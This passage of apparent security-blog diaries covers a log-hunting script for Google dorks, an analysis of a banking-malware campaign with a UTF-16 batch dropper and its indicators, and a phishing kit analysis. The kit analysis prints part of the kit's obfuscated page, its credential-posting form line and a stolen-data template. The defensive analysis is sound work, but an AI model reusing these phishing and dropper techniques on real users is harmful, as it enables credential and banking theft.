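    Returns one hit per (line, dork) pair so a single request probing several
    dorks shows up under each of them.
    """
    hits = []
    needles = [(d, d.lower()) for d in dorks]
    for line in log_text.splitlines():
        m = COMBINED.match(line)
        if not m or is_trusted(m["ip"]):
            continue
        uri = m["uri"].lower()
        for dork, needle in needles:
            if needle in uri:
                hits.append({"ip": m["ip"], "uri": m["uri"],
                             "status": int(m["status"]), "dork": dork})
    return hits


if __name__ == "__main__":
    for h in hunt(ACCESS_LOG, load_dorks(DORKS_CSV)):
        print(h)
```

Status codes are kept in the output because a 200 on a dork URI is the interesting case (the page exists and is reachable) while a stream of 404s mostly tells you who is scanning you.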

A good alternative to Apache logs is to use a tool like Bro that will extract URLs on the fly from the network traffic. With this technique, you'll also be able to detect rogue web applications!

Happy hunting!

[1] https://www.exploit-db.com/google-hacking-database/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments

Published: 2017-12-02

Phishing campaign uses old ".bat" script to spread banking malware - and it is flying under the radar

While hunting this week, I came across a phishing campaign spreading banking malware that uses an old DOS batch script as the dropper. Surprisingly enough, the “.bat” file has a VirusTotal (VT) rating of 0/58, which helps the cybercriminals target 9 different Brazilian banks. In today’s diary, I’ll give some details about this ongoing campaign and its indicators of compromise (IOCs).

Let’s start with the malware analysis flow in Figure 1, from the e-mail phishing to the credentials theft.

Figure 1 – Malware analysis

Usually, recent malware droppers are implemented in VBScript (VBS), JavaScript, or Microsoft Office document macros, to name a few. In this case, the dropper is a 2.6 kb ".bat" script that uses some rudimentary functions to identify the victim's processor architecture and then downloads the rest of the malicious files via PowerShell calls.

In an attempt to hide the ".bat" script code, the contents of the file are encoded in UTF-16, which renders as Chinese characters, as seen in Figure 2.

Figure 2 - ".bat" script with UTF-16 encoding
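A triage helper for exactly this trick, added here as an example (not code from the diary or from the campaign): detect the UTF-16 encoding from the BOM, or from the NUL-byte pattern when there is no BOM, decode the script, and tag the lines that carry the behaviours described in this diary (a PowerShell call, the PROCESSOR_ARCHITECTURE check, the %PROGRAMDATA% path). The sample batch file is constructed for the demo; it references the System.ps1 name from the diary but contains no download or payload logic.

```python
import codecs
import re

# Constructed UTF-16 LE batch file with BOM, mimicking the encoding trick (not the campaign's file).
SAMPLE_BAT = codecs.BOM_UTF16_LE + (
    "@echo off\r\n"
    "if \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (set arch=64) else (set arch=32)\r\n"
    "set work=%PROGRAMDATA%\\dex%username%\\\r\n"
    "powershell -ExecutionPolicy Bypass -File %work%System.ps1\r\n"
).encode("utf-16-le")

# Indicators worth surfacing to the analyst (names are my own labels).
SUSPICIOUS = [
    ("powershell", re.compile(r"powershell", re.I)),
    ("arch-detect", re.compile(r"PROCESSOR_ARCHITECTURE", re.I)),
    ("programdata-path", re.compile(r"%PROGRAMDATA%", re.I)),
    ("url", re.compile(r"https?://", re.I)),
]


def decode_script(data):
    """Return (encoding, text).

    BOM first; otherwise a UTF-16 guess from which byte positions are NUL
    (ASCII text in UTF-16 LE has NULs in the odd positions, BE in the even ones);
    otherwise treat it as a plain single-byte script.
    """
    if data.startswith(codecs.BOM_UTF16_LE) or data.startswith(codecs.BOM_UTF16_BE):
        return "utf-16", data.decode("utf-16")       # the codec consumes the BOM itself
    sample = data[:64]
    if len(sample) >= 4 and sample[1::2].count(0) > len(sample) // 4:
        return "utf-16-le", data.decode("utf-16-le", errors="replace")
    if len(sample) >= 4 and sample[0::2].count(0) > len(sample) // 4:
        return "utf-16-be", data.decode("utf-16-be", errors="replace")
    return "cp1252", data.decode("cp1252", errors="replace")


def triage(data):
    """Decode a .bat blob and list (line number, tags, line) for every flagged line."""
    enc, text = decode_script(data)
    lines = text.splitlines()
    findings = []
    for lineno, line in enumerate(lines, 1):
        tags = [name for name, rx in SUSPICIOUS if rx.search(line)]
        if tags:
            findings.append((lineno, tags, line.strip()))
    return {"encoding": enc, "lines": len(lines), "findings": findings}


if __name__ == "__main__":
    report = triage(SAMPLE_BAT)
    print(report["encoding"], report["lines"], "lines")
    for lineno, tags, line in report["findings"]:
        print(f"{lineno:3d} {','.join(tags):20s} {line}")
```

The encoding detection is the part that matters for detection engineering: string-based rules that look for "powershell" in the raw bytes will miss a UTF-16 script because every character is interleaved with a NUL byte, which is the likely reason for the 0/58 score mentioned above.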

Figure 3 shows the part of the script that identifies the victim's processor architecture and downloads a ".zip" containing the other malware pieces.

Figure 3 – Batch script downloading the rest of the malware files

Next, a VBS is created to execute a powershell script contained in the System.ps1.bin file, as seen in Figure 4.

Figure 4 - VBS script creation for Powershell script execution

The objective of the powershell script is to inject the malicious "DLL" into a Windows process. In the malware samples I analyzed, the processes chosen for injection were "explorer.exe" and "svchost.exe".

Once running, the DLL identifies the victim's geographic location using "ip-api.com/json/", as seen in Figure 5, and subsequently checks which anti-virus and banking software is installed on the victim's system.

Figure 5 – Victim Geolocation

The collected information is encoded in base64 and sent to the attackers through an HTTP connection, as can be seen in Figure 6.

Figure 6 - C&C communication

From this moment on, the malware monitors the victim’s access to 9 different Brazilian financial institutions and applies a screen overlay using fake forms. This way, the victim's typing goes into the malware's form and the information is sent to the cybercriminals.

In addition, after a detailed analysis, it was possible to reverse the binary strings and discover the malware's keylogger and remote access capabilities, as seen in Figure 7.

Figure 7 – Reversing binary strings

Indicators of Compromise (IOCs)

Use the indicators listed below to prevent possible infections in your organization as well as to verify if your environment has already been compromised by this threat.

MD5

ba0239533dd7f85cb0d1df58fc129222
ed053046882301a893dda1171d62dd50
e94ea2673908d605f08c6a6d666dc97e
b34b92270968db55ab07633c11ad0883
7a7da8eaba3dc74622a9ae8b42b009cf

SHA256

e26e6b2d6da1b396d5be6f99731d0bed2afbb803f51f42f34ae8fe8fdd043878
c9416ba1a87da4bf89520d8d4493c4bf76ace4de5ea62299e7f00f6af9d89dd5
12802aa40908fb8821f26d0c09039586ed3bf511c143ca0e8f9ccced29d1cc6b
3a888d7e39083a10827ad25af083d60e8e65cf6177ce57d5ae73fb752df9e77d
ba263af4baf72ae579a63ec51b5a7f576438c0c0abcd301137490703d63961a3

FILESYSTEM

%PROGRAMDATA%\dex%username%\
%PROGRAMDATA%\dex%username%\_.dll

NETWORK

hxxp://198.50.160.145
hxxp://panel-anonimato.cf/

--
Renato Marinho
Morphus Labs| LinkedInTwitter

0 Comments

Published: 2017-12-01

Phishing Kit (Ab)Using Cloud Services

When you build a phishing kit, there are several critical points to address. You must generate a nice-looking page that matches the original as closely as possible, and you must work stealthily so as not to be blocked or, at least, to be blocked as late as possible.

Here is a simple phishing kit example. It starts with a simple pop-up to lure the victim:

Then a classic fake blurred invoice is displayed. The target is asked to provide his/her credentials to unlock the secret document. The page also contains some animated GIFs that make it more “dynamic” or attractive. Nothing fancy…

Let's check the original code. The obfuscation technique is simple: the whole page is percent (hex) encoded and written out through unescape():

<script language=javascript>document.write(unescape('%0A%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54
%44%20%58%48%54%4D%4C%20%31%2E%30%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F
%78%68%74%6D%6C%31%2F%44%54%44%2F%78%68%74%6D%6C%31%2D%74%72%61%6E%73%69%74%69%6F%6E%61%6C%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%20%78%6D%6C%6E%73%3D%22%68%74
%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%31%39%39%39%2F%78%68%74%6D%6C%22%3E%3C%68%65%61%64%3E%0A%0A%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%69%63%6F%6E
%22%20%74%79%70%65%3D%22%69%6D%61%67%65%2F%6A%70%67%22%20%68%72%65%6 … Redacted … C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'))</script>

Easy to decode with a tool like JSDetox[1]. Let’s have a look at the decoded HTML. When analyzing this kind of phishing kit, the first thing I’m looking for is the HTML form details. Let’s grep for “POST”. Usually, form data are posted to a PHP script that writes a flat text file on the compromised server. Here is an example found a few weeks ago:
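The decode-then-grep-for-POST step in a few lines of Python, added here as an example (JSDetox is the tool the diary uses; this is not its code nor the kit's): pull every unescape('...') payload out of the page, decode both the %XX and the %uXXXX forms that JavaScript's unescape() accepts, and list the method and action of each form in the result. The obfuscated sample is constructed and points at example.test, not at the kit's real JotForm URL.

```python
import re

# Constructed sample in the kit's style: document.write(unescape('...')) around a tiny form.
SAMPLE_HTML = (
    '<html><script language=javascript>document.write(unescape(\''
    '%3C%66%6F%72%6D%20%6D%65%74%68%6F%64%3D%22%50%4F%53%54%22%20'
    '%61%63%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%65%78%61%6D%70%6C%65%2E%74%65%73%74%2F%78%2F%22%3E'
    '%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%70%61%73%73%77%6F%72%64%22%3E'
    '%3C%2F%66%6F%72%6D%3E\'))</script></html>'
)

UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
ESCAPED = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
FORM_TAG = re.compile(r"<form\b[^>]*>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def js_unescape(s):
    """JavaScript unescape(): %XX -> one Latin-1 char, %uXXXX -> one UTF-16 unit, rest untouched."""
    return ESCAPED.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_document_write(html):
    """Concatenate the decoded payload of every unescape('...') call found in the page.

    Extraction often wraps the long string across lines, hence re.S on the pattern.
    """
    return "".join(js_unescape(m.group(2)) for m in UNESCAPE_CALL.finditer(html))


def form_targets(html):
    """The 'grep for POST' step: method and action of every <form> in the decoded HTML."""
    targets = []
    for tag in FORM_TAG.finditer(html):
        attrs = {name.lower(): (dq or sq or bare)
                 for name, dq, sq, bare in ATTR.findall(tag.group(0))}
        targets.append({"method": attrs.get("method", "GET").upper(),
                        "action": attrs.get("action")})
    return targets


if __name__ == "__main__":
    decoded = decode_document_write(SAMPLE_HTML)
    print(decoded)
    for t in form_targets(decoded):
        print(t["method"], "->", t["action"])
```

The action URL is what you want to report to the hosting provider or cloud service, as done with JotForm below; reading it out of the decoded HTML avoids running the kit's JavaScript at all.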

---------------------------------------------------------------------------
Netflix Info
---------------------------------------------------------------------------
Login Details
---------------------------------------------------------------------------
Username:
Password: 
---------------------------------------------------------------------------
Personal Details
---------------------------------------------------------------------------
Full Name: 
Date of Birth: 
Address: 
Mailbox:
City: 
Postcode: 
Phone Number: 
---------------------------------------------------------------------------
Card Details
---------------------------------------------------------------------------
Name on Card: 
Card Number: 
Expiry Date: 
CVV Code: 
Card BIN: 
Card Bank:
Card Type: 
IBAN: 
---------------------------------------------------------------------------
Sent from x.x.x.x on 10-12-2017 6:16:am via Mozilla/5.0 (iPhone; CPU iPhone OS 11_0_1 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A402 Safari/604.1

This is very simple but this method is facing many problems:

  • If the compromised server is cleaned, there is a risk for the attacker to lose all the stolen data.
  • Such data are not easy to parse.
  • The domain/IP address of the server can be quickly reported as malicious and injected in lists of IOCs.

To prevent this, attackers are trying to find alternative solutions to host their data in safe places. While icons, pictures and pieces of code are commonly stored in cloud services, the sample above uses another well-known cloud service to host the data posted by the HTML form. It posts the data to a JotForm account:

<form method="POST" name="login_form" id="login_form" action="https://submit.jotformeu.com/submit/xxxxxxxxxx8564/" target="_self"/>

JotForm[2] is a cloud service that helps to build online forms. The advantages for attackers are multiple: collected data can be analyzed and exported, each submission to a form can generate email notifications, everything is HTTPS based and, probably the most interesting, jotform.com is ranked #6532 in the Alexa top-1M[3] and jotformeu.com is ranked #139946. So, the chances of being blocked are reduced because JotForm is used by many legitimate websites and many organizations exclude the Top-X websites from their blocklists to avoid annoying users.

In the case described here, I contacted JotForm and, after some investigations, they suspended the abused account within a few hours. Thanks to them!

[1] https://github.com/svent/jsdetox
[2] https://www.jotform.com/
[3] http://s3.amazonaws.com/alexa-static/top-1m.csv.zip

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments